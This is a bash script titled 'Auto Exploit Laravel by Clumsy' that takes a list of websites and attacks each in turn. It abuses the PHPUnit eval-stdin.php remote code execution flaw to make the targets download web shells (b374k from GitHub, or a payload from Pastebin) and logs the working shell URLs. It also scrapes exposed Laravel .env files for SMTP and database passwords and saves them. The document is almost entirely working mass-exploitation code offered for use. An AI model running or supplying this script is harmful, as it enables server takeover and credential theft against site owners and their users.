Mã
#!/bin/bash
function rce {
local url=$1
local cekos='<?php echo php_uname("a"); ?>'
local upshell='<?php system("wget https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php -O unit.php"); ?>'
url=$(echo $url | xargs)
cek=$(curl -s -X GET "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -d "$cekos" --max-time 50)
if [[ $cek == *"Linux"* ]]; then
echo "[os] $cek"
echo "$cek" >> phpunitvuln.txt
echo "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" >> phpunitvuln.txt
curl -s -X GET "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -d "$upshell" >/dev/null
cekshell=$(curl -s "${url}/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su")
if [[ $cekshell == *"IDBTE4M"* ]]; then
echo "[Shell Uploaded] ${url}/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su"
echo "$cek" >> shell_phpunit.txt
echo "${url}/vendor/phpunit/phpunit/src/Util/PHP/unit.php?ngacengan_su" >> shell_phpunit.txt
else
echo "[Shell not Uploaded] : $cekshell"
fi
else
echo "[Not Vuln] : $url"
fi
}
function rce2 {
local url=$1
local cekos='<?php echo php_uname("a"); ?>'
local upshell='<?php fwrite(fopen("raimu.php","w+"),file_get_contents("https://pastebin.com/raw/DWAYZwk5")); ?>'
url=$(echo $url | xargs)
cek=$(curl -s -X GET "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -d "$cekos" --max-time 50)
if [[ $cek == *"Linux"* ]]; then
echo "[os] $cek"
echo "$cek" >> phpunitvuln.txt
echo "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" >> phpunitvuln.txt
curl -s -X GET "${url}/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" -d "$upshell" >/dev/null
cekshell=$(curl -s "${url}/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su")
if [[ $cekshell == *"IDBTE4M"* ]]; then
echo "[Shell Uploaded] ${url}/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su"
echo "$cek" >> shell_phpunit2.txt
echo "${url}/vendor/phpunit/phpunit/src/Util/PHP/raimu.php?ngacengan_su" >> shell_phpunit2.txt
else
echo "[Shell not Uploaded] : $url"
fi
else
echo "[Not Vuln] : $url"
fi
}
function getsmtp {
local url=$1
local eNv="${url}/.env"
local headers="Connection: keep-alive\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9,fr;q=0.8"
rsmTP=$(curl -s -X GET "$eNv" -H "$headers" --max-time 50)
if [[ $rsmTP == *"mailtrap.io"* ]]; then
echo -e "\033[1;31;40m"
echo "[ - ] NOT FOUND SMTP [ - ] \n"
elif [[ $rsmTP == *"APP_NAME"* ]]; then
echo -e "\033[1;32;40m"
echo -e "[ + ] FOUND SMTP [ + ]\n"
if [[ $rsmTP == *"MAIL_HOST"* ]]; then
SMTP=$(echo "$rsmTP" | grep -oP 'MAIL_HOST=\K.*')
PORT=$(echo "$rsmTP" | grep -oP 'MAIL_PORT=\K.*')
USERNAME=$(echo "$rsmTP" | grep -oP 'MAIL_USERNAME=\K.*')
PASSWORD=$(echo "$rsmTP" | grep -oP 'MAIL_PASSWORD=\K.*')
MENCRYPTION=$(echo "$rsmTP" | grep -oP 'MAIL_ENCRYPTION=\K.*')
echo -e "= = = = = = = = = = = = = = = = = = = = = = = ="
echo -e "SMTP HOST => $SMTP"
echo -e "SMTP PORT => $PORT"
echo -e "SMTP USERNAME => $USERNAME"
echo -e "SMTP PASSWORD => $PASSWORD"
echo -e "SMTP ENCRYPTION => $MENCRYPTION"
echo -e "= = = = = = = = = = = = = = = = = = = = = = = ="
echo -e "SMTP HOST : $SMTP\nSMTP USER : $USERNAME\nSMTP PASSWORD : $PASSWORD" >> SMTP.txt
fi
elif [[ $rsmTP == *"DB_USERNAME=root"* ]]; then
ROOTU=$(echo "$rsmTP" | grep -oP 'DB_USERNAME=\K.*')
ROOTP=$(echo "$rsmTP" | grep -oP 'DB_PASSWORD=\K.*')
echo "[ + ] Maybe you can get VPS / DATABASE [+]"
echo "HOSTS : $url\nUSERNAME : $ROOTU\nPASSWORD : $ROOTP" >> VPS.txt
else
echo "[ - ] CAN'T FOUND BUG [ - ]"
fi
}
function robot {
local url=$1
rce "$url"
rce2 "$url"
getsmtp "$url"
}
function main {
if [ $# -lt 1 ]; then
echo "Auto Exploit Laravel by Clumsy"
echo "Usage : $0 list.txt"
else
while IFS= read -r line; do
robot "$line"
done < "$1"
fi
}
main "$@"